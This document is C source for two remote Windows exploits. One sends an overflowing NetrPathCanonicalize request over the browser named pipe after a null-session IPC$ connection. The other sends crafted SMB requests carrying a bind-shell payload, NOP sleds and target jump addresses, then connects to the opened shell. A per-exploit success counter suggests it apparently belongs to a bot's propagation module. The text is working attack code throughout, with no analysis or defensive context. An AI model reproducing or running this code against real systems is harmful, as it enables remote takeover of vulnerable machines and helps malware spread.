BOOL exnetapi (EXINFO exinfo, int nTarget)
{
char szIPC[ 8192 ];
NETRESOURCE NetSource;
DWORD nNullSessionError;
char szPipe[ 8192 ];
HANDLE hPipe;
RPC_ReqBind BindPacket;
DWORD nBytesWritten;
DWORD nBytesRead;
unsigned char RecvBuff[ 8192 ];
NetrPathCanonicalize_Start PStart;
NetrPathCanonicalize_End PEnd;
size_t nPathLen;
size_t nBufferPos;
unsigned char *pPath;
size_t nPacketSize;
unsigned char *pPacket;
RPC_ReqNorm ReqNormalHeader;
bool bExit;
int nCount;
OVERLAPPED ov;
if( _stricmp( exinfo.ip, "." ) )
{
_snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", exinfo.ip );
memset( &NetSource, 0 ,sizeof( NetSource ) );
NetSource.lpRemoteName = szIPC;
nNullSessionError = fWNetAddConnection2( &NetSource, "", "", 0 );
}
_snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\browser", exinfo.ip );
hPipe = CreateFile( szPipe,
GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
NULL );
if( hPipe == INVALID_HANDLE_VALUE )
return false;
memset( &BindPacket, 0, sizeof( BindPacket ) );
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11;
BindPacket.NormalHeader.flags = 3;
BindPacket.NormalHeader.representation = 0x00000010;
BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 0;
BindPacket.maxtsize = MAX_FRAG_SIZE;
BindPacket.maxrsize = MAX_FRAG_SIZE;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
memcpy( BindPacket.Interface1.byte, "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88", 16 );
BindPacket.Interface1.version = 3;
memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
BindPacket.Interface2.version = 2;
if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
{
CloseHandle( hPipe );
return false;
}
ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, NULL );
srand( (int)time( NULL ) );
memset( &PStart, 0x41, sizeof( PStart ) );
memset( &PEnd, 0x41, sizeof( PEnd ) );
PStart.ReferendID = rand();
PStart.Server.length = 1;
PStart.Server.offset = 0;
PStart.Server.maxlength = 1;
PStart.Server_Data = L'';
if( Targets[ nTarget ].bIsWinXP )
{
PEnd.Prefix.length = 1;
PEnd.Prefix.offset = 0;
PEnd.Prefix.maxlength = 1;
memcpy( PEnd.Prefix_Data, "\x00\x00\x00\x00", 4 );
}
else
{
PEnd.Prefix.length = 2;
PEnd.Prefix.offset = 0;
PEnd.Prefix.maxlength = 2;
memcpy( PEnd.Prefix_Data, "\xeb\x02\x00\x00", 4 );
}
PEnd.OutBufLen = rand() % 250 + 1;
PEnd.Type = rand() % 250 + 1;;
PEnd.Flags = 0;
nPathLen = Targets[ nTarget ].nPathLen;
pPath = (unsigned char*)malloc( nPathLen );
if( !pPath )
{
CloseHandle( hPipe );
return false;
}
memset( pPath, 0x90, nPathLen - 2 );
memset( pPath + nPathLen - 2, 0, 2 );
nBufferPos = Targets[ nTarget ].nShellCodeAddr;
memcpy( pPath + nBufferPos, stack, sizeof( stack ) - 1 );
nBufferPos += sizeof( stack ) - 1;
memcpy( pPath + nBufferPos, scode, sizeof( scode ) - 1 );
nBufferPos += sizeof( scode ) - 1;
nBufferPos = Targets[ nTarget ].nOffsetStartAddr;
if( Targets[ nTarget ].bIsWinXP )
{
memcpy( pPath + nBufferPos, &nOffset2, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 8;
memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 32;
memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 8;
memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
nBufferPos += 4;
nBufferPos += 32;
nBufferPos += sizeof( wchar_t );
}
else
{
for( size_t n = 0; n < 16; n++ )
memcpy( pPath + nBufferPos + ( n * sizeof( nOffset1 ) ), &nOffset1, sizeof( nOffset1 ) );
}
nPacketSize =
sizeof( PStart )
+ sizeof( UNISTR2 )
+ nPathLen + sizeof( wchar_t ) + 4
+ sizeof( NetrPathCanonicalize_End );
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
CloseHandle( hPipe );
free( pPath );
return false;
}
memset( pPacket, 0, nPacketSize );
nBufferPos = 0;
memcpy( pPacket, &PStart, sizeof( PStart ) );
nBufferPos += sizeof( NetrPathCanonicalize_Start );
( (UNISTR2*)( pPacket + nBufferPos ) )->length = (UINT32)ceil( (float)nPathLen / sizeof( wchar_t ) );
( (UNISTR2*)( pPacket + nBufferPos ) )->offset = 0;
( (UNISTR2*)( pPacket + nBufferPos ) )->maxlength = ( (UNISTR2*)( pPacket + nBufferPos ) )->length;
nBufferPos += sizeof( UNISTR2 );
memcpy( pPacket + nBufferPos, pPath, nPathLen );
nBufferPos += nPathLen;
while( nBufferPos % 4 )
nBufferPos++;
memcpy( pPacket + nBufferPos, &PEnd, sizeof( PEnd ) );
nBufferPos += sizeof( PEnd );
free( pPath );
memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0;
ReqNormalHeader.NormalHeader.flags = 3;
ReqNormalHeader.NormalHeader.representation = 0x00000010;
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 0;
ReqNormalHeader.prescontext = 0;
ReqNormalHeader.opnum = 0x1f;
memset( &ov, 0, sizeof( ov ) );
ov.hEvent = CreateEvent( NULL, TRUE, FALSE, NULL );
bExit = false;
nCount = 0;
while( !bExit && nCount < MAX_TRIES )
{
nCount++;
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nBufferPos, MAX_FRAG_SIZE, true ) )
break;
if( ov.hEvent )
{
if( !ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, &ov ) && GetLastError() != ERROR_IO_PENDING )
return false;
else
{
if( WaitForSingleObject( ov.hEvent, TRY_TIMEOUT ) == WAIT_TIMEOUT )
{
bExit = true;
ConnectShell (exinfo, 101);
exploit[exinfo.exploit].stats++;
}
}
}
}
CloseHandle( hPipe );
free( pPacket );
if( ov.hEvent )
CloseHandle( ov.hEvent );
if (bExit)
return true;
return false;
}
bool Exploit2 ( EXINFO exinfo , SOCKET sockfd, int which ) {
int i;
int opt = 0;
char hostipc[40];
char hostipc2[40*2];
unsigned short port;
unsigned char *sc;
// char *sc = (char *)malloc(4096);
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(req4)+20];
char screq[BUFSIZE+sizeof(req7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
unsigned int targetnum = 0;
int len;
char smblen;
char unclen;
sprintf((char *)hostipc,"\\\\%s\\ipc$", exinfo.ip);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, req4, sizeof(req4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
port = fhtons(dport)^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
sc = bindshell;
// DWORD scsize = GetRNS0TerminatedShellcode(sc, 4096, GetIP(exinfo.sock), filename);
// if (!scsize) {
// free(sc);
// return false;
// }
//
if (which != 0) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttarget[which].jmpaddr, 4);
memcpy(&buf[2036], sc, strlen((const char *)sc));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttarget[which].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], sc, strlen((const char*)sc));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, sc, strlen((const char*)sc));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttarget[which].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);
// printf("[*] Attacking ... ");
if (fsend(sockfd, req4u, smblen+4, 0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req5, sizeof(req5)-1, 0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, req6, sizeof(req6)-1, 0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1600, 0);
if ( which != 0 ) {
//if ( (atoi(argv[1]) == 1) || (atoi(argv[1]) == 2)) {
memcpy(screq2k, req8, sizeof(req8)-1);
memcpy(screq2k+sizeof(req8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, req9, sizeof(req9)-1);
memcpy(screq2k2+sizeof(req9)-1, sendbuf+4348-sizeof(req8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(req9)-1+(LEN+1)*2-4348-sizeof(req8)+1+206, shit3, sizeof(shit3)-1);
if (fsend(sockfd, screq2k, 4348, 0) == -1)
return false;
len = frecv(sockfd, recvbuf, 1600, 0);
if (fsend(sockfd, screq2k2, 4060, 0) == -1)
return false;
} else {
memcpy(screq, req7, sizeof(req7)-1);
memcpy(screq+sizeof(req7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(req7)-1+BUFSIZE, shit1, 9*16);
screq[BUFSIZE+sizeof(req7)-1+1500-304-1] = 0;
if (fsend(sockfd, screq, BUFSIZE+sizeof(req7)-1+1500-304, 0)== -1)
return false;
}
// len = recv(sockfd, recvbuf, 1600, MSG_NOWAIT);
Sleep(300);
if (ConnectShell(exinfo))
return true;
return false;
// return true;
}
